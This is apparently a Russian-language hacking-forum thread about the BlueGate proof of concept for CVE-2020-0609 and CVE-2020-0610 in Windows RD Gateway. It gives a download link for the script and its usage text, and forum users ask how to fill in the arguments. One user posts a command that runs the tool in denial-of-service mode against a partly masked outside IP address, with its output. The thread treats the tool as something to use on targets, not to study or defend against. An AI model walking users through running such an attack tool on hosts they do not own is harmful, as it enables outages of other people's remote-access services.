DoS RCE, Windows Remote Desktop Gateway (RD Gateway), BlueGate, CVE-2020-0609\0610

[tabac]

PoC (Denial of Service + scanner) для CVE-2020-0609 и CVE-2020-0610

Эти баги позволяют хакеру, не прошедшему проверку подлинности, выполнить удаленный код с самыми высокими привилегиями через RD Gateway для RDP.

Использовать:

BlueGate.py [-h] -M {check,dos} [-P PORT] host

Убедитесь, что у вас установлен pyOpenSSL для python3.


Скачать:

https://raw.githubusercontent.com/ollypwn/BlueGate/master/BlueGate.py

 

[timbo]

а можно поподробнее что вот сюда писать BlueGate.py [-h] -M {check,dos} [-P PORT] host
точнее на примере ?!

 

[lukas]

а можно поподробнее что вот сюда писать BlueGate.py [-h] -M {check,dos} [-P PORT] host
точнее на примере ?!

в официальном ридми указано так

Make sure you have pyOpenSSL installed for python3.

usage: BlueGate.py [-h] -M {check,dos} [-P PORT] host

positional arguments:
  host                  IP address of host

optional arguments:
  -h, --help            show this help message and exit
  -M {check,dos}, --mode {check,dos}
                        Mode
  -P PORT, --port PORT  UDP port of RDG, default: 3391

 

[timbo]

в официальном ридми указано так

Make sure you have pyOpenSSL installed for python3.

usage: BlueGate.py [-h] -M {check,dos} [-P PORT] host

positional arguments:
  host                  IP address of host

optional arguments:
  -h, --help            show this help message and exit
  -M {check,dos}, --mode {check,dos}
                        Mode
  -P PORT, --port PORT  UDP port of RDG, default: 3391

т.е писать так пример:
BlueGate.py [-h] -M {check,dos} [-P 3391] 127.0.0.1 так или не так вот это не понятно?!

 

[ibenji]

:~# python3 BlueGate.py -M dos -P 3391 92.154.X.X
[*] Sending DoS packets to 92.154.X.X...

т.е писать так пример:
BlueGate.py [-h] -M {check,dos} [-P 3391] 127.0.0.1 так или не так вот это не понятно?!